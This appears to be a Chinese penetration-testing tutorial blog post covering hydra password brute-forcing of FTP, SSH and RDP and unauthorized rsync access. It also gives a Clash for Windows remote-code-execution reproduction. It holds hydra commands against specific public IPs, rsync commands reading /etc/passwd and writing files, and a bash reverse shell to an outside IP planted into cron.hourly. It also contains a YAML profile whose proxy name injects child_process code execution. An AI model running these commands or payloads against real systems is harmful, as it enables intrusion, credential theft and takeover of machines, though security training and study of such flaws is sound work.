端口协议&桌面应用&QQ&WPS等RCE&hydra口令猜解&未授权检测

Ethan医生3个月前服务安全79


#端口协议-口令爆破&未授权

参考:https://mp.weixin.qq.com/s/xp_LOUmGImrRmkPrDqxKjw

-弱口令爆破

https://github.com/vanhauser-thc/thc-hydra

hydra是一个自动化的爆破工具,暴力破解弱密码,

是一个支持众多协议的爆破工具,已经集成到KaliLinux中,直接在终端打开即可

-s PORT 可通过这个参数指定非默认端口。

-l LOGIN 指定破解的用户,对特定用户破解。

-L FILE 指定用户名字典。

-p PASS 小写,指定密码破解,少用,一般是采用密码字典。

-P FILE 大写,指定密码字典。

-e ns 可选选项,n:空密码试探,s:使用指定用户和密码试探。

-C FILE 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数。

-M FILE 指定目标列表文件一行一条。

-o FILE 指定结果输出文件。

-f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解。

-t TASKS 同时运行的线程数,默认为16。

-w TIME 设置最大超时的时间,单位秒,默认是30s。

-v / -V 显示详细过程。

server 目标ip

service 指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等。

例子:

FTP:文件传输协议

RDP:Windows远程桌面协议

SSH:Linux安全外壳协议

hydra -L test -P 10top1K.txt 47.110.53.159 ftp -V

hydra -l root -P 10top1K.txt 47.110.53.159 ssh -V

hydra -l administrator -P 10top1K.txt 47.110.53.159 rdp -V

 

 

-未授权案例:

https://github.com/xk11z/unauthorized

rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。其中rsync协议默认监听873端口,如果目标开启了rsync服务,并且没有配置ACL或访问密码,我们将可以读写目标服务器文件。

判断:rsync rsync://120.27.220.186:57830/

利用:

-读取文件:rsync rsync://120.27.220.186:57830/src/

-下载文件:rsync rsync://120.27.220.186:57830/src/etc/passwd ./

-上传文件:rsync -av passwd rsync://120.27.220.186:57830/src/tmp/passwd

反弹shell:

1、获取信息:

rsync rsync://120.27.220.186:57830/src/etc/crontab /root/cron.txt

2.创建文件

touch shell

#!/bin/bash

/bin/bash -i >& /dev/tcp/47.94.236.117/5566 0>&1

chmod +x shell

3、上传文件

rsync -av shell rsync://120.27.220.186:57830/src/etc/cron.hourly

4、等待接受反弹

 

#桌面应用-QQ&WPS&Clash

-QQ RCE 漏洞复现

见打包文档利用说明

 

-WPS RCE 漏洞复现

第80天复现讲过

 

-Clash RCE 漏洞复现

Windows:Clash.for.Windows 版别 <= v 0.19.8

Mac:Clash.for.Windows.app版别 <= v0.19.81

1、本地创立一个.yaml的文件

port: 7890

socks-port: 7891

allow-lan: true

mode: Rule

log-level: info

external-controller: :9090

proxies:

- name: a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>

type: socks5

server: 127.0.0.1

port: "17938"

skip-cert-verify: true

- name: abc

type: socks5

server: 127.0.0.1

port: "8088"

skip-cert-verify: true

 

 

proxy-groups:

-

name: <img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>

type: select

proxies:

- a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>

2、Profiles挑选导入.yaml

3、切换节点之后成功调用代码执行


标签: HydraClash

相关文章

Solr搜索&Shiro身份&Log4j日志&本地CVE环境复现

-Solr:主要基于HTTP和Apache Lucene实现的全文搜索服务器。历史漏洞:https://avd.aliyun.com/search?q=Solr黑盒特征:图标及端口83931、命令执行...

云产品篇&堡垒机场景&JumpServer&绿盟SAS&Teleport&麒麟&齐治

云产品篇&堡垒机场景&JumpServer&绿盟SAS&Teleport&麒麟&齐治

堡垒机攻防:(意义)https://mp.weixin.qq.com/s/-WcgyVoTCZuPamVtI5MrJw堡垒机漏洞:(已知)https://avd.aliyun.com/search?q...

开发组件安全&Jackson&FastJson各版本&XStream&CVE环境复现

黑盒检测:Java应用 请求参数数据以json/xml格式发送测试黑盒判断:通过提交数据报错信息得到什么组件xml格式(xstream) 或 json 格式(fastjson jackson)白盒:直...

云原生篇&K8s安全&Config泄漏&Etcd存储&Dashboard鉴权&Proxy暴露

云原生篇&K8s安全&Config泄漏&Etcd存储&Dashboard鉴权&Proxy暴露

#云原生-K8s安全-etcd未授权访问攻击2379端口:默认通过证书认证,主要存放节点的数据,如一些token和证书。 第一种:没有配置指定--client-cert-auth 参数打开证...

云服务篇&弹性计算&云数据库&实例元数据&控制角色&AK控制台接管

元数据解释:实例元数据(metadata)包含了弹性计算云服务器实例在阿里云系统中的信息,您可以在运行中的实例内方便地查看实例元数据,并基于实例元数据配置或管理实例。(基本信息:实例ID、IP地址、网...

开发框架安全&SpringBoot&Struts2&Laravel&ThinkPHP&CVE复现

#PHP-框架安全-Thinkphp&Laravel#Laravel是一套简洁、优雅的PHP Web开发框架(PHP Web Framework)。1、CVE-2021-3129 RCELar...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。